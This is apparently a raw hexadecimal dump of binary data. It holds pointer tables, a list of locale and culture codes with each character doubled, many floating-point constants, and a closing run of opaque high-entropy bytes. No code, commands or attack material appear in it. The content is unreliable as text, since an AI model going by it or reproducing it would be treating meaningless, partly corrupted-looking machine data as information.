ff780810100003e3a04000000000048bff780810100003f3b04000000000058aff780810100004044040000000000689ff780810100004145040000000000788ff780810100004347040000000000887ff780810100004440040000000000a057f780810100004541040000000000b047f780810100004642040000000000c037f780810100004743040000000000d027f78081010000494d040000000000e017f780810100004a4e040000000000f007f780810100004b4f04000000000000f8f880810100004c4804000000000010e8f880810100004e4a04000000000020d8f880810100004f4b04000000000030c8f88081010000505404000000000040b8f88081010000525604000000000050a8f8808101000056520400000000006098f8808101000057530400000000007088f880810100005a5e0400000000008078f8808101000065610400000000009068f880810100006b6f040000000000a058f880810100006c68040000000000b048f880810100008185040000000000c038f880810100000109080000000000d028f88081010000040c08000000000028ffd78081010000070f080000000000e018f880810100000901080000000000f008f880810100000a0208000000000000f9f980810100000c0408000000000010e9f98081010000101808000000000020d9f98081010000131b08000000000030c9f98081010000141c08000000000040b9f98081010000161e08000000000050a9f980810100001a120800000000006099f980810100001d150800000000007881f980810100002c240800000000008871f980810100003b33080000000000a059f980810100003e36080000000000b049f98081010000434b080000000000c039f980810100006b63080000000000d821f98081010000010d0c0000000000e811f9808101000004080c0000000000f801f98081010000070b0c000000000008f2fa808101000009050c000000000018e2fa80810100000a060c000000000028d2fa80810100000c000c000000000038c2fa80810100001a160c000000000048b2fa80810100003b370c0000000000609afa80810100006b670c0000000000708afa80810100000111100000000000807afa80810100000414100000000000906afa80810100000717100000000000a05afa80810100000919100000000000b04afa80810100000a1a100000000000c03afa80810100000c1c100000000000d02afa80810100001a0a100000000000e01afa80810100003b2b100000000000f00afa8081010000011514000000000000fbfb8081010000041014000000000010ebfb8081010000071314000000000020dbfb8081010000091d14000000000030cbfb80810100000a1e14000000000040bbfb80810100000c1814000000000050abfb80810100001a0e140000000000609bfb80810100003b2f1400000000007883fb808101000001191800000000008873fb808101000009111800000000009863fb80810100000a12180000000000a853fb80810100000c14180000000000b843fb80810100001a02180000000000c833fb80810100003b23180000000000e01bfb8081010000011d1c0000000000f00bfb808101000009151c000000000000fcfc80810100000a161c000000000010ecfc80810100001a061c000000000020dcfc80810100003b271c000000000038c4fc8081010000012120000000000048b4fc8081010000092920000000000058a4fc80810100000a2a2000000000006894fc80810100003b1b2000000000007884fc808101000001252400000000008874fc8081010000092d2400000000009864fc80810100000a2e240000000000a854fc80810100003b1f240000000000b844fc80810100000129280000000000c834fc80810100000921280000000000d824fc80810100000a22280000000000e814fc8081010000012d2c0000000000f804fc808101000009252c000000000008f5fd80810100000a262c000000000018e5fd8081010000013130000000000028d5fd8081010000093930000000000038c5fd80810100000a3a30000000000048b5fd8081010000013534000000000058a5fd8081010000093d3400000000006895fd80810100000a3e3400000000007885fd808101000001393800000000008875fd80810100000a323800000000009865fd8081010000013d3c0000000000a855fd80810100000a363c0000000000b845fd80810100000141400000000000c835fd80810100000a4a400000000000d825fd80810100000a4e440000000000e815fd80810100000a42480000000000f805fd80810100000a464c000000000008f6fe80810100000a5a50000000000018e6fe808101000004787c000000000028d6fe80810100001a667c000000000038c6fe80810100006161727200000000626267670000000063636161000000007a7a68682d2d4343484853530000000063637373000000006464616100000000646465650000000065656c6c0000000065656e6e0000000065657373000000006666696900000000666672720000000068686565000000006868757500000000696973730000000069697474000000006a6a6161000000006b6b6f6f000000006e6e6c6c000000006e6e6f6f0000000070706c6c00000000707074740000000072726f6f000000007272757500000000686872720000000073736b6b0000000073737171000000007373767600000000747468680000000074747272000000007575727200000000696964640000000075756b6b00000000626265650000000073736c6c0000000065657474000000006c6c7676000000006c6c74740000000066666161000000007676696900000000686879790000000061617a7a0000000065657575000000006d6d6b6b0000000061616666000000006b6b61610000000066666f6f0000000068686969000000006d6d7373000000006b6b6b6b000000006b6b797900000000737377770000000075757a7a00000000747474740000000070706161000000006767757500000000747461610000000074746565000000006b6b6e6e000000006d6d72720000000073736161000000006d6d6e6e0000000067676c6c000000006b6b6f6f6b6b0000737379797272000064646969767600000000000000000000616172722d2d53534141000000000000626267672d2d42424747000000000000636361612d2d45455353000000000000636373732d2d43435a5a000000000000646461612d2d44444b4b000000000000646465652d2d4444454500000000000065656c6c2d2d47475252000000000000666669692d2d46464949000000000000666672722d2d46465252000000000000686865652d2d49494c4c000000000000686875752d2d48485555000000000000696973732d2d49495353000000000000696974742d2d494954540000000000006e6e6c6c2d2d4e4e4c4c0000000000006e6e62622d2d4e4e4f4f00000000000070706c6c2d2d50504c4c000000000000707074742d2d4242525200000000000072726f6f2d2d52524f4f000000000000727275752d2d52525555000000000000686872722d2d4848525200000000000073736b6b2d2d53534b4b000000000000737371712d2d41414c4c000000000000737376762d2d53534545000000000000747468682d2d54544848000000000000747472722d2d54545252000000000000757572722d2d50504b4b000000000000696964642d2d4949444400000000000075756b6b2d2d55554141000000000000626265652d2d4242595900000000000073736c6c2d2d53534949000000000000656574742d2d454545450000000000006c6c76762d2d4c4c56560000000000006c6c74742d2d4c4c5454000000000000666661612d2d49495252000000000000767669692d2d56564e4e000000000000686879792d2d41414d4d00000000000061617a7a2d2d41415a5a2d2d4c4c616174746e6e00000000656575752d2d454553530000000000006d6d6b6b2d2d4d4d4b4b00000000000074746e6e2d2d5a5a4141000000000000787868682d2d5a5a41410000000000007a7a75752d2d5a5a4141000000000000616166662d2d5a5a41410000000000006b6b61612d2d4747454500000000000066666f6f2d2d46464f4f000000000000686869692d2d49494e4e0000000000006d6d74742d2d4d4d5454000000000000737365652d2d4e4e4f4f0000000000006d6d73732d2d4d4d59590000000000006b6b6b6b2d2d4b4b5a5a0000000000006b6b79792d2d4b4b4747000000000000737377772d2d4b4b454500000000000075757a7a2d2d55555a5a2d2d4c4c616174746e6e00000000747474742d2d5252555500000000000062626e6e2d2d49494e4e000000000000707061612d2d49494e4e000000000000676775752d2d49494e4e000000000000747461612d2d49494e4e000000000000747465652d2d49494e4e0000000000006b6b6e6e2d2d49494e4e0000000000006d6d6c6c2d2d49494e4e0000000000006d6d72722d2d49494e4e000000000000737361612d2d49494e4e0000000000006d6d6e6e2d2d4d4d4e4e000000000000636379792d2d4747424200000000000067676c6c2d2d454553530000000000006b6b6f6f6b6b2d2d49494e4e000000007373797972722d2d53535959000000006464696976762d2d4d4d565600000000717175757a7a2d2d42424f4f000000006e6e73732d2d5a5a41410000000000006d6d69692d2d4e4e5a5a000000000000616172722d2d49495151000000000000646465652d2d4343484800000000000065656e6e2d2d47474242000000000000656573732d2d4d4d5858000000000000666672722d2d42424545000000000000696974742d2d434348480000000000006e6e6c6c2d2d424245450000000000006e6e6e6e2d2d4e4e4f4f000000000000707074742d2d50505454000000000000737372722d2d535350502d2d4c4c616174746e6e00000000737376762d2d4646494900000000000061617a7a2d2d41415a5a2d2d4343797972726c6c00000000737365652d2d535345450000000000006d6d73732d2d42424e4e00000000000075757a7a2d2d55555a5a2d2d4343797972726c6c00000000717175757a7a2d2d4545434300000000616172722d2d454547470000000000007a7a68682d2d48484b4b000000000000646465652d2d4141545400000000000065656e6e2d2d41415555000000000000656573732d2d45455353000000000000666672722d2d43434141000000000000737372722d2d535350502d2d4343797972726c6c00000000737365652d2d46464949000000000000717175757a7a2d2d5050454500000000616172722d2d4c4c59590000000000007a7a68682d2d53534747000000000000646465652d2d4c4c555500000000000065656e6e2d2d43434141000000000000656573732d2d47475454000000000000666672722d2d43434848000000000000686872722d2d4242414100000000000073736d6d6a6a2d2d4e4e4f4f00000000616172722d2d44445a5a0000000000007a7a68682d2d4d4d4f4f000000000000646465652d2d4c4c494900000000000065656e6e2d2d4e4e5a5a000000000000656573732d2d43435252000000000000666672722d2d4c4c5555000000000000626273732d2d424241412d2d4c4c616174746e6e0000000073736d6d6a6a2d2d5353454500000000616172722d2d4d4d414100000000000065656e6e2d2d49494545000000000000656573732d2d50504141000000000000666672722d2d4d4d4343000000000000737372722d2d424241412d2d4c4c616174746e6e0000000073736d6d61612d2d4e4e4f4f00000000616172722d2d54544e4e00000000000065656e6e2d2d5a5a4141000000000000656573732d2d44444f4f000000000000737372722d2d424241412d2d4343797972726c6c0000000073736d6d61612d2d5353454500000000616172722d2d4f4f4d4d00000000000065656e6e2d2d4a4a4d4d000000000000656573732d2d5656454500000000000073736d6d73732d2d4646494900000000616172722d2d5959454500000000000065656e6e2d2d43434242000000000000656573732d2d43434f4f00000000000073736d6d6e6e2d2d4646494900000000616172722d2d5353595900000000000065656e6e2d2d42425a5a000000000000656573732d2d50504545000000000000616172722d2d4a4a4f4f00000000000065656e6e2d2d54545454000000000000656573732d2d41415252000000000000616172722d2d4c4c424200000000000065656e6e2d2d5a5a5757000000000000656573732d2d45454343000000000000616172722d2d4b4b575700000000000065656e6e2d2d50504848000000000000656573732d2d43434c4c000000000000616172722d2d41414545000000000000656573732d2d55555959000000000000616172722d2d42424848000000000000656573732d2d50505959000000000000616172722d2d51514141000000000000656573732d2d42424f4f000000000000656573732d2d53535656000000000000656573732d2d48484e4e000000000000656573732d2d4e4e4949000000000000656573732d2d505052520000000000007a7a68682d2d43434848545400000000737372720000000038ccf480810100004242000000000000887bf380810100002c2c000000000000808c0d8181010000717100000000000020d2f280810100000000000000000000909c0d8181010000d8d8000000000000a0ac0d8181010000dada000000000000b0bc0d8181010000b1b1000000000000c0cc0d8181010000a0a0000000000000d0dc0d81810100008f8f000000000000e0ec0d8181010000cfcf000000000000f0fc0d8181010000d5d5000000000000000d0c8181010000d2d2000000000000101d0c8181010000a9a9000000000000202d0c8181010000b9b9000000000000303d0c8181010000c4c4000000000000404d0c8181010000dcdc000000000000505d0c81810100004343000000000000606d0c8181010000cccc000000000000707d0c8181010000bfbf000000000000808d0c8181010000c8c80000000000007083f380810100002929000000000000909d0c81810100009b9b000000000000a8a50c81810100006b6b00000000000030c3f380810100002121000000000000c0cd0c8181010000636300000000000028daf280810100000101000000000000d0dd0c81810100004444000000000000e0ed0c81810100007d7d000000000000f0fd0c8181010000b7b700000000000030c2f28081010000020200000000000008060f8181010000454500000000000048baf28081010000040400000000000018160f8181010000474700000000000028260f8181010000878700000000000050a2f28081010000050500000000000038360f8181010000484800000000000058aaf28081010000060600000000000048460f8181010000a2a200000000000058560f8181010000919100000000000068660f8181010000494900000000000078760f8181010000b3b300000000000088860f8181010000abab00000000000030c4f48081010000414100000000000098960f81810100008b8b0000000000006092f280810100000707000000000000a8a60f81810100004a4a000000000000689af280810100000808000000000000b8b60f8181010000a3a3000000000000c8c60f8181010000cdcd000000000000d8d60f8181010000acac000000000000e8e60f8181010000c9c9000000000000f8f60f8181010000929200000000000008070e8181010000baba00000000000018170e8181010000c5c500000000000028270e8181010000b4b400000000000038370e8181010000d6d600000000000048470e8181010000d0d000000000000058570e81810100004b4b00000000000068670e8181010000c0c000000000000078770e8181010000d3d30000000000007082f28081010000090900000000000088870e8181010000d1d100000000000098970e8181010000dddd000000000000a8a70e8181010000d7d7000000000000b8b70e8181010000caca000000000000c8c70e8181010000b5b5000000000000d8d70e8181010000c1c1000000000000e8e70e8181010000d4d4000000000000f8f70e8181010000a4a40000000000000818118181010000adad0000000000001808118181010000dfdf000000000000283811818101000093930000000000003828118181010000e0e00000000000004858118181010000bbbb0000000000005848118181010000cece0000000000006878118181010000e1e10000000000007868118181010000dbdb0000000000008898118181010000dede0000000000009888118181010000d9d9000000000000a8b8118181010000c6c600000000000040b3f380810100002323000000000000b8a81181810100006565000000000000788bf380810100002a2a000000000000c8d81181810100006c6c00000000000058abf380810100002626000000000000d8c81181810100006868000000000000788af280810100000a0a000000000000e8f81181810100004c4c000000000000986bf380810100002e2e000000000000f8e811818101000073730000000000008072f280810100000b0b000000000000081910818101000094940000000000001809108181010000a5a50000000000002839108181010000aeae00000000000038291081810100004d4d0000000000004859108181010000b6b60000000000005849108181010000bcbc00000000000018ecf480810100003e3e00000000000068791081810100008888000000000000e013f38081010000373700000000000078691081810100007f7f000000000000887af280810100000c0c00000000000088991081810100004e4e000000000000a053f380810100002f2f00000000000098891081810100007474000000000000e81af280810100001818000000000000a8b9108181010000afaf000000000000b8a91081810100005a5a0000000000009062f280810100000d0d000000000000c8d91081810100004f4f000000000000689bf380810100002828000000000000d8c91081810100006a6a00000000000020d3f380810100001f1f000000000000e8f91081810100006161000000000000986af280810100000e0e000000000000f8e91081810100005050000000000000a052f280810100000f0f000000000000081a1381810100009595000000000000180a1381810100005151000000000000a85af280810100001010000000000000283a13818101000052520000000000009063f380810100002d2d000000000000382a1381810100007272000000000000b043f380810100003131000000000000485a1381810100007878000000000000f80bf380810100003a3a000000000000584a1381810100008282000000000000b042f28081010000111100000000000020d4f480810100003f3f000000000000687a1381810100008989000000000000786a1381810100005353000000000000b84bf380810100003232000000000000889a138181010000797900000000000050a3f380810100002525000000000000988a138181010000676700000000000048bbf380810100002424000000000000a8ba1381810100006666000000000000b8aa1381810100008e8e0000000000008073f380810100002b2b000000000000c8da1381810100006d6d000000000000d8ca138181010000838300000000000010e4f480810100003d3d000000000000e8fa138181010000868600000000000000f4f480810100003b3b000000000000f8ea1381810100008484000000000000a85bf380810100003030000000000000081b1281810100009d9d000000000000180b1281810100007777000000000000283b1281810100007575000000000000382b1281810100005555000000000000b84af280810100001212000000000000485b1281810100009696000000000000584b1281810100005454000000000000687b1281810100009797000000000000c032f280810100001313000000000000786b1281810100008d8d000000000000d82bf380810100003636000000000000889b1281810100007e7e000000000000c83af280810100001414000000000000988b1281810100005656000000000000d022f280810100001515000000000000a8bb1281810100005757000000000000b8ab1281810100009898000000000000c8db1281810100008c8c000000000000d8cb1281810100009f9f000000000000e8fb128181010000a8a8000000000000d82af280810100001616000000000000f8eb1281810100005858000000000000e012f280810100001717000000000000081c158181010000595900000000000008fcf480810100003c3c000000000000180c1581810100008585000000000000283c158181010000a7a7000000000000382c1581810100007676000000000000485c1581810100009c9c000000000000f002f280810100001919000000000000584c1581810100005b5b00000000000038cbf380810100002222000000000000687c1581810100006464000000000000786c158181010000bebe000000000000889c158181010000c3c3000000000000988c158181010000b0b0000000000000a8bc158181010000b8b8000000000000b8ac158181010000cbcb000000000000c8dc158181010000c7c7000000000000f80af280810100001a1a000000000000d8cc1581810100005c5c00000000000038c6fe8081010000e3e3000000000000e8fc158181010000c2c20000000000000015148181010000bdbd000000000000180d148181010000a6a60000000000003025148181010000999900000000000000f3f380810100001b1b000000000000485d1481810100009a9a000000000000584d1481810100005d5d000000000000c033f380810100003333000000000000687d1481810100007a7a00000000000028dcf480810100004040000000000000786d1481810100008a8a000000000000e81bf380810100003838000000000000889d1481810100008080000000000000f003f380810100003939000000000000988d148181010000818100000000000008fbf380810100001c1c000000000000a8bd1481810100005e5e000000000000b8ad1481810100006e6e00000000000010e3f380810100001d1d000000000000c8dd1481810100005f5f000000000000d023f380810100003535000000000000d8cd1481810100007c7c00000000000028dbf380810100002020000000000000e8fd148181010000626200000000000018ebf380810100001e1e000000000000f8ed1481810100006060000000000000c83bf380810100003434000000000000081e1781810100009e9e00000000000020361781810100007b7b0000000000006093f380810100002727000000000000382e1781810100006969000000000000485e1781810100006f6f000000000000584e1781810100000303000000000000687e178181010000e2e2000000000000786e1781810100009090000000000000889e178181010000a1a1000000000000988e178181010000b2b2000000000000a8be178181010000aaaa000000000000b8ae1781810100004646000000000000c8de1781810100007070000000000000616166662d2d7a7a6161000000000000616172722d2d61616565000000000000616172722d2d62626868000000000000616172722d2d64647a7a000000000000616172722d2d65656767000000000000616172722d2d69697171000000000000616172722d2d6a6a6f6f000000000000616172722d2d6b6b7777000000000000616172722d2d6c6c6262000000000000616172722d2d6c6c7979000000000000616172722d2d6d6d6161000000000000616172722d2d6f6f6d6d000000000000616172722d2d71716161000000000000616172722d2d73736161000000000000616172722d2d73737979000000000000616172722d2d74746e6e000000000000616172722d2d7979656500000000000061617a7a2d2d61617a7a2d2d6363797972726c6c0000000061617a7a2d2d61617a7a2d2d6c6c616174746e6e00000000626265652d2d62627979000000000000626267672d2d6262676700000000000062626e6e2d2d69696e6e000000000000626273732d2d626261612d2d6c6c616174746e6e00000000636361612d2d65657373000000000000636373732d2d63637a7a000000000000636379792d2d67676262000000000000646461612d2d64646b6b000000000000646465652d2d61617474000000000000646465652d2d63636868000000000000646465652d2d64646565000000000000646465652d2d6c6c6969000000000000646465652d2d6c6c75750000000000006464696976762d2d6d6d76760000000065656c6c2d2d6767727200000000000065656e6e2d2d6161757500000000000065656e6e2d2d62627a7a00000000000065656e6e2d2d6363616100000000000065656e6e2d2d6363626200000000000065656e6e2d2d6767626200000000000065656e6e2d2d6969656500000000000065656e6e2d2d6a6a6d6d00000000000065656e6e2d2d6e6e7a7a00000000000065656e6e2d2d7070686800000000000065656e6e2d2d7474747400000000000065656e6e2d2d7575737300000000000065656e6e2d2d7a7a616100000000000065656e6e2d2d7a7a7777000000000000656573732d2d61617272000000000000656573732d2d62626f6f000000000000656573732d2d63636c6c000000000000656573732d2d63636f6f000000000000656573732d2d63637272000000000000656573732d2d64646f6f000000000000656573732d2d65656363000000000000656573732d2d65657373000000000000656573732d2d67677474000000000000656573732d2d68686e6e000000000000656573732d2d6d6d7878000000000000656573732d2d6e6e6969000000000000656573732d2d70706161000000000000656573732d2d70706565000000000000656573732d2d70707272000000000000656573732d2d70707979000000000000656573732d2d73737676000000000000656573732d2d75757979000000000000656573732d2d76766565000000000000656574742d2d65656565000000000000656575752d2d65657373000000000000666661612d2d69697272000000000000666669692d2d6666696900000000000066666f6f2d2d66666f6f000000000000666672722d2d62626565000000000000666672722d2d63636161000000000000666672722d2d63636868000000000000666672722d2d66667272000000000000666672722d2d6c6c7575000000000000666672722d2d6d6d636300000000000067676c6c2d2d65657373000000000000676775752d2d69696e6e000000000000686865652d2d69696c6c000000000000686869692d2d69696e6e000000000000686872722d2d62626161000000000000686872722d2d68687272000000000000686875752d2d68687575000000000000686879792d2d61616d6d000000000000696964642d2d69696464000000000000696973732d2d69697373000000000000696974742d2d63636868000000000000696974742d2d696974740000000000006a6a61612d2d6a6a70700000000000006b6b61612d2d676765650000000000006b6b6b6b2d2d6b6b7a7a0000000000006b6b6e6e2d2d69696e6e0000000000006b6b6f6f6b6b2d2d69696e6e000000006b6b6f6f2d2d6b6b72720000000000006b6b79792d2d6b6b67670000000000006c6c74742d2d6c6c74740000000000006c6c76762d2d6c6c76760000000000006d6d69692d2d6e6e7a7a0000000000006d6d6b6b2d2d6d6d6b6b0000000000006d6d6c6c2d2d69696e6e0000000000006d6d6e6e2d2d6d6d6e6e0000000000006d6d72722d2d69696e6e0000000000006d6d73732d2d62626e6e0000000000006d6d73732d2d6d6d79790000000000006d6d74742d2d6d6d74740000000000006e6e62622d2d6e6e6f6f0000000000006e6e6c6c2d2d626265650000000000006e6e6c6c2d2d6e6e6c6c0000000000006e6e6e6e2d2d6e6e6f6f0000000000006e6e73732d2d7a7a6161000000000000707061612d2d69696e6e00000000000070706c6c2d2d70706c6c000000000000707074742d2d62627272000000000000707074742d2d70707474000000000000717175757a7a2d2d62626f6f00000000717175757a7a2d2d6565636300000000717175757a7a2d2d707065650000000072726f6f2d2d72726f6f000000000000727275752d2d72727575000000000000737361612d2d69696e6e000000000000737365652d2d66666969000000000000737365652d2d6e6e6f6f000000000000737365652d2d7373656500000000000073736b6b2d2d73736b6b00000000000073736c6c2d2d7373696900000000000073736d6d61612d2d6e6e6f6f0000000073736d6d61612d2d737365650000000073736d6d6a6a2d2d6e6e6f6f0000000073736d6d6a6a2d2d737365650000000073736d6d6e6e2d2d666669690000000073736d6d73732d2d6666696900000000737371712d2d61616c6c000000000000737372722d2d626261612d2d6363797972726c6c00000000737372722d2d626261612d2d6c6c616174746e6e00000000737372722d2d737370702d2d6363797972726c6c00000000737372722d2d737370702d2d6c6c616174746e6e00000000737376762d2d66666969000000000000737376762d2d73736565000000000000737377772d2d6b6b65650000000000007373797972722d2d7373797900000000747461612d2d69696e6e000000000000747465652d2d69696e6e000000000000747468682d2d7474686800000000000074746e6e2d2d7a7a6161000000000000747472722d2d74747272000000000000747474742d2d7272757500000000000075756b6b2d2d75756161000000000000757572722d2d70706b6b00000000000075757a7a2d2d75757a7a2d2d6363797972726c6c0000000075757a7a2d2d75757a7a2d2d6c6c616174746e6e00000000767669692d2d76766e6e000000000000787868682d2d7a7a61610000000000007a7a68682d2d636368687373000000007a7a68682d2d636368687474000000007a7a68682d2d63636e6e0000000000007a7a68682d2d68686b6b0000000000007a7a68682d2d6d6d6f6f0000000000007a7a68682d2d737367670000000000007a7a68682d2d747477770000000000007a7a75752d2d7a7a61610000000000000000000000000000000000000000f00fff00000000000000000000000000f08f7f00000000000000000000000000f807ff0000000000000000000000000008080000000000000000fffc030000000000000000000000000001010000000000000000000000000000ff0000000000f00f00000000000000000000000000f0ff0f0000000000000000000000000008080000000000000000000eebc3336eb010e43f000000000000000000000078b310e43f0000000000000035a0e4591f9e01963e0000000000000000000050435797ec3f00000000000000251b5cbce1d0ec3d3e0000000000000000000000000000404000000000000000000000000000f0cf3f00000000000000000000000000e0df3f0000000000000000010100000000000000000000000000000000000000605f3f00000000000000000000000000e0df3f0000000000000055000000000080ea3f00000000000000000000000000d0ef3f000000000000009a030000000050f63f0000000000000055000000000090fa3f000000000000000000000000f8774fc000000000000000fdfa0700000000000000000000000000000000000000b08f3f00000000000000000000000000eed13f00000000000000000000000000f1ce3f0000000000000000000000000010100000000000000000ff000000000000807f00000000000000e6b201000000e08a3f00000000000000d4127c23000010b63f000000000000009fcea0f6246a2b5d3f00000000000000f00fa295fcb4bc033f0000000000000000000000ff000000ff00000000000000010100000202000003030000000000000000000000000000000000900e23e6643f000070a47bc4543f000060f52ccd4b3f0000a0d6e2ef443f0000a0ed79b5be3f00005058931fbb3f0000c0b18f79b83f00008010ced5b43f0000f09ad135b13f0000a023899bae3f0000e0550027ad3f0000501f10cbab3f000000535491a93f0000d0136e3aa83f0000f054f6cba63f000020d90c6fa53f000070b3540ba33f0000a0a63ea6a13f0000b0751349a03f0000a0a1bb1a9f3f000020c166269e3f0000c0c257f79d3f0000c0a746829c3f00009081fc4e9c3f00008081b91c9b3f0000e0d8ba279a3f000010a9f2ed993f000040c397b3983f0000c058447b983f0000d02a590b973f0000c06ac0c3963f0000d079999a953f000020d90c5f953f0000009a2011943f0000901df3d2933f000010c594ec923f0000a0d175aa913f00007014a268913f0000b01e2928903f0000c0e80c948f3f0000f0d6a2348f3f0000904231538f3f0000301c6ff28e3f0000407496138e3f0000608bebb28d3f000010420ded8d3f0000e088d50f8d3f000050602ba88c3f0000e048d0cb8c3f000030e306668c3f0000a00f9d868b3f0000d0eeb13b8b3f000020a16a5f8b3f0000304730f28a3f0000604182168a3f000040c07e4b8a3f000040d4cdef893f0000f0ade902893f0000b06dd3b9883f000000147dde883f00006061c274883f00003096baa4873f0000000375ce873f00003028d777873f000040a6c19e863f000090fded39863f0000a00e7661863f0000d079998a853f0000a0ffd732853f000070a00f65853f0000b04cca8d843f0000d0346936843f000030b96d5f843f000040aad086833f00007078992d833f000010f4025a833f0000a0dd4181823f00008055442c823f000000ec0a5b823f0000a061fa85813f0000b0e6c62e813f0000a00b4f5a813f0000c000f887803f000080161a33803f0000301dcd5f803f0000a062dbd9ff3f0000703f0c83ff3f000060ddd1acff3f0000808c9a56ff3f0000003d827fff3f0000105fa728ff3f0000f0b253d0fe3f0000a0b822fbfe3f00008050b2a3fe3f000090fae14afe3f000010f75472fe3f000030769a1dfe3f000010988cc6fd3f0000e04c80eefd3f0000d064e096fd3f0000f06fe3befd3f000080eeca66fd3f0000b090ec0efd3f000090264531fd3f000050602bd8fc3f000020aecc81fc3f000020f0b9aafc3f000080766653fc3f00006061b97bfc3f0000e0102e1dfc3f000030f5c0c1fb3f0000700e52e8fb3f0000d0cc4f97fb3f000070d0d9bdfb3f00007079a964fb3f000000589e02fb3f000030bc6028fb3f000040e6b4d7fa3f000030969efdfa3f000050dcd29bfa3f000090c8dc41fa3f0000404ba16ffa3f000070d46b0afa3f00004064d130fa3f0000d05a90dcf93f00005088e7f9f93f0000d0dc69a3f93f000080a8a24cf93f000080ab8469f93f0000e0f5c112f93f0000d0371f3ef93f000070d1bcdaf83f0000e0a20085f83f0000408caaa1f83f0000a09db64cf83f000030a73868f83f000010c90a14f83f00005053fb3ff83f000020360ad4f73f000090815188f73f0000c03596abf73f0000e022454ff73f00000079d263f73f00003028d707f73f0000a000523af73f0000706204dff63f0000b0dd54f0f63f00008032ee95f63f000000e19eb6f63f000050a95b6bf63f0000708b3e0cf63f0000b0570f21f63f0000f04db6c1f53f000080fe50e4f53f00006049789bf53f0000a01ecdb9f53f0000704ea85cf53f0000f0581072f53f000020de2410f53f0000300ec337f53f0000305976d4f43f0000403f3e8af43f000070f0e3a8f43f0000f09ce94ef43f0000b0f4e36cf43f0000f0f7ce02f43f0000c0765c21f43f000030615dc0f33f00005087fae1f33f000050190683f33f000040e7d7bcf33f000030c1605df33f00004067947ff33f000080c99d18f33f00001048ad39f33f0000005345dbf23f0000605a0dfaf23f0000606e5695f23f000000cfb7b5f23f0000700ce554f23f0000a0b6ac77f23f0000d04d4717f23f0000f0e1ea36f23f0000304368d5f13f0000a061faf5f13f000050ada695f13f000060465ab2f13f0000e0dca052f13f0000e0a0fc72f13f000080b2ee12f13f0000d0c1ed32f13f0000e03ec5d4f03f0000d049a2f4f03f0000a0e21994f03f00008059a3b5f03f0000702ec455f03f000090416876f03f0000f0c2eb16f03f0000a0227a37f03f000050b0ebdbef3f0000a0d66dcbef3f000030342ffbef3f00001099b3eaef3f000040454f9aef3f0000e0982189ef3f0000f0138bb8ef3f000070363ea8ef3f000080202757ef3f000010e26446ef3f0000300b9d76ef3f0000f08bce65ef3f000050e47014ef3f000060843703ef3f0000303cef33ef3f0000c0ebd922ef3f0000105342d0ee3f0000401242c1ee3f0000401946ceee3f0000306876ffee3f0000004f72ecee3f0000d0ed719dee3f0000a0847f8aee3f0000707369bbee3f0000508aa2a9ee3f000040e92e56ee3f00006010e647ee3f0000a08f8a74ee3f000010f75462ee3f0000c0565413ee3f0000b08eef00ee3f0000f02e010eee3f00007007993fee3f00006068f52cee3f0000a0319ad9ed3f0000504309c8ed3f000070fda5faed3f0000101037e5ed3f0000305b2e97ed3f0000d01e9d81ed3f0000002b49b0ed3f0000d0af0fa2ed3f0000408db3aced3f000060739e5fed3f00002072c949ed3f0000a029207bed3f0000e0590e65ed3f0000e0022717ed3f0000b0b4d006ed3f0000504ffd30ed3f0000c0f2c222ed3f0000201fc12ced3f0000703448dfec3f0000b0f258c9ec3f0000e0d911fbec3f0000103a1ce5ec3f000050435797ec3f0000000000000000000000000000008faf92909eb6b88fe9d9231d5a66be8c6a85ac96e5985bf354040f597fb720ee6a6908934fb0aec936b45edd542b87f92cb463a6ad4470c4a2b1313f4f0d9fc0f070676233c4a6d4282572ad3750883e93d4528db5170c36fa173d2ed780923b3c4b9d79da3de790333e07c7cf497830fd35f04190b583dc29a8f152d3cd0738815a13a7b11319d7d618e90415717337f9c5c2b0f92a63fd6c969057002e3e2e3060a323ee5b4e2b911ab67359af59e250ce95850aee472e71a5ec4c8283582d93111d3f4499552814c01d4313c17b23d1130bcfd85244cbb57880b692bd1ace8e79f033007b763a99fa7ac068ff6d23d95ec806e941c0215e660cad18982f362aa8f152d3cd17286505347ae6c1313875291e8de279782c0458e24e7c8c3737e04a81fc38e1242a0f912f9f007b76237fb348b1971b912815971af85f09f7c2510ba10bf08b9f1712876f78902e29157a21b8a0adc7eec4a3a934543720552b5e7b61ee1f5add3240d7d55b42c8ba2997f6c05a88c5992fbc52d666a4d50629c6f0390d1227261104dbcac826d10329a4d53c8e5a1c9d18bd0764553a7b09c0a89e468a5cb40c1d2d1f7531a09b8ac453369eceb470d220a6d218ab10fc341f86890068195738110b0d5c41ae44d425be6d6696b5f74021da3df0d0b4076e1aaa982efaf8b88a2c37eae797db432114c09bc30dfd1b52215d32672f899c2d1f08117ea78677f7c5f7d6d4edadda422e541e19102ec675dd5d660cad18983f2602afd6a94418b63897722eeee3a24a2e2bc08073dc18f529815b4a1153b554339d9c57b2f5a4962309000dc720659c1a3a16bccf1ffc912da190e6a032f7a0122344ce82e51ac317084d4a5fc80cb3276b53747b5f245c106af8d686cf2f3a186cf0c3aee44d4f170e17e3d5d98b5b2608fd9151b0df441e9aa526a388383e34e8aff63ae0db9424a407c3c2bd0cc4d457978272eb855c012a773288d795b5103239577b89b30a17bfdf2640b0e75d0c91090de726316005226af852b648d2cdd0f7200be69d7602299afe0f948c712b267eec7b1d63bc0d581001826b0caf0386182d7dcb737107187ef244e0d3e605848d355b8419fd07f90d210b091ae92492a12aa5d19dfb0b84039379273b76076ad20e1db2133339cebba8e80b5a5632bc52d666a4d53619c67461599125251b9e72203c455aff106a217f062206091ff46dfe6ac0837d331b65e8bb6d0154152097a8e2ad5e030d6e25fe88fb3ff8015a79ca5bb9858e004ae011a7eabe4c04dd65588c94c8330391f7de662c688b11a094ca127026bf05ef8a99304215851ea76fad7942b6eb0309c76b1e8abeb936df2a5b2596abb600c86088ede2022508a495adfedb9831109b1c80703be7b912dcba6644ef903d060a379c75ccd7de11375fd8d7aca66a07768c92ae97aef708ca9593fd2de9ef1a9cf16ee8f5c1d40b68a47be81e2d68043193482b03aa6e06e40dffaaac223c0ede3f9bd044c3e2cc9bffb3e46d73351b2fc6e53d77560818f137e80ac3e7d3d0b8488635342f461d1f8c2dc931235e3b5a0adf65f9020e1f32f9cce07469f309c27cf113e6933f165f28a826a533bbd75e32672f899c3d0fb6fed78a66710b09bfbcd409454dc214918e37e636769a14583d86a9ff952e0eaac0ef57834f0d133ecc833df93f44cd14cb836a149cbc019113bbc3538de2c5971d7cd770441600ad99286b42684b1662708e63d41ef4c27b4f15fba211610bbbe86bfec8d6dd050755b5292f46bc1bbf313f3e3449fa08f660b61e6d2a730a21ccc58816b70809b9ad53741d47640dc8f760cfd7a8ea05dc14359546b